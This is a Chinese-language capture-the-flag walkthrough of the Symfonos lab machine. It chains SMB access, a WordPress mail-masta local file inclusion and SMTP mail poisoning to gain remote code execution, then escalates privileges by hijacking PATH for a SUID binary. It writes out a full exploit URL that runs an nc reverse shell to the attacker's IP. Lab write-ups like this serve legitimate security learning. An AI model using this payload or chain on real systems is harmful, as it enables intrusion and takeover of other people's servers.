Symfonos:SMTP与LFI

日常靶机

扫出靶机IP

然后用nmap来获取主机信息

可以看到，主机开启了25端口的SMTP服务

于是直接连接上共享

smb://192.168.40.155

然后打开不需要密码的目录

这里基本上给了信息，用这几个密码尝试连接helios目录，发现qwerty可以

访问h3l105，发现了一个wordpress搭建的站点

点击链接会跳转到http://symfonos.local，所以在本机的hosts里面加上这个IP和域名的映射

因为是WP搭的站，直接用wpscan扫一下

wpscan –url http://symfonos.local/h3l105

扫到了两个插件

然后去searchsploit试试，扫出来两个洞，其中有个本地文件包含

然后根据给定的poc去尝试漏洞

那么联系到之前扫到的25端口的smtp服务，可以试图通过邮件污染的方法进行RCE

发送一个有问题的邮件，然后弹一个shell过来

[http://192.168.40.155/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc%20-e%20/bin/bash%20192.168.40.150%201551](http://192.168.40.155/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc -e /bin/bash 192.168.40.150 1551)

接下来是提权，先考虑suid的方法

发现了一个可疑的文件

strings一下这个文件，发现了一个更加可疑的curl命令

此时的思路是，statuscheck文件执行的时候，会从环境变量里面获得curl的目录，然后执行curl命令，那么我们如果伪造curl文件，并写入环境变量中，就可以提权

通过这个思路，我们成功提权

并且拿到flag